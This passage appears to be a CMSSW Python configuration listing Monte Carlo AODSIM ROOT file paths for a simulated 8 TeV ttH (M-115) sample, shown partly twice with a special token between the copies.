'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root'
])
secFiles.extend([])
<|reserved_special_token_1|>
import FWCore.ParameterSet.Config as cms
maxEvents = cms.untracked.PSet(input=cms.untracked.int32(-1))
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()
source = cms.Source('PoolSource', fileNames=readFiles, secondaryFileNames=
secFiles)
readFiles.extend([
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root'
,
